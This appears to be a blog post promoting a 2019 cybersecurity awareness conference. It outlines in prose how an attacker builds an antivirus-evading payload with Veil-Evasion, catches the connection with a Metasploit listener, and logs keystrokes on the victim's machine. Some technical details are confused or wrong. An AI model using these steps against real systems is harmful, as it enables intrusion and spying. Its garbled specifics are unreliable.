For those who understand technology, we live in an extremely interesting time. We’re reminded on an almost daily basis of the struggles of corporations by headlines alerting us to the latest breach. Major parts of the American infrastructure have been called “indefensible” by those tasked with ensuring its security, and nation-states have started to not only see the value in waging cyber-attacks against each other but have begun to do so by amassing large cyber-armies. At the top of this pyramid of understanding sits the payloads. Payloads are programs used by hackers to gain access into your computers, mobile phones and any other internet connected devices.
Using a payload, the hacker is able to travel invisibly without making a sound, manipulate anything they want, go wherever they want on the target’s systems and after erase all traces of their presence in your system.
How a Hacker gets into a protected system
To create undetectable payloads, the attacker uses a tool called VEIL that helps in the creation of undetectable payloads into the target’s system in order to bypass the security measures and devices at the target’s side and remain undetected. The module for Veil that creates undetectable payloads is called Evasion. These payloads cab bypass security measures like include antivirus software, intrusion detection systems, firewalls, web application firewalls, and numerous others. As nearly all of these devices employ a signature-based detection scheme where they maintain a database of known exploits and payload signatures the key is to use Veil-Evasion to help us create exploits so quickly and does not require a lot of expertise.
One of the tools Veil is selected for use, and an attacker selects option 1 which is evasion with 41 payloads that could be used to create malicious content to execute on the target’s machine
A list command is used to view a number of payloads to select from them the basic payload to use
An APT hacker can select payload written in C language on number 7 in order to create an undetected malicious content that is executed from the target’s browser
The Hacker then sets an IP that he uses to listen on the target’s ports and sets a port 8080 which is not easily suspected in order to listen from the action of the target on the browser
Then the attacker generates the executable malicious content which can be executed on a Windows Operating System and which is stored in /var/lib/lib/compiled on the attacker machine
The created file is copied to /var/www/html folder in order for it to be launched on the browser when the target surfs
Apache2 hosting server is started on the target’s machine and PostgreSQL database started and status checked to see if it’s up
Then a console from where the attacker listens to the target’s intervention is setup on msfconsole
Exploit is setup and payload set to set a connection with the listening target’s command prompt, target IP (LHOST) set and listening port (LPORT) set and exploit run
Then as soon as the target browses and executes the malicious content on their browser, starts a session on attacker’s side
System exploration and manipulation
After getting the meterpreter session with the target, the hacker can access the entire machine by running the possess command on the meterpreter
A hacker uses the pwd command to show the working directory on the target machine and after lists all available directories on the target home/root directory
A hacker can decide to get info about the time when the target is idle using >idletime command for his own reasons and may decide to capture keystrokes from the target’s keyboard using keyscan_start, keyscan_dump and keyscan_stop commands
Think this sounds like the next big Hollywood Sci-fi movie Unfortunately, the threat is much more real than that, and it’s only getting worse. There are cases in which an the Hacker manipulates the systems and are really happening in the real world, and the only thing scarier is what the future holds.
You need to get sensitized about the risks in cyber-attacks and threats to the systems that you operate, Join us at IFIS in partnership with Summit Consulting, on our annual cyber-security awareness and risk management conference, from the 16th – 18th October 2019
For more details and registration procedure, please click here.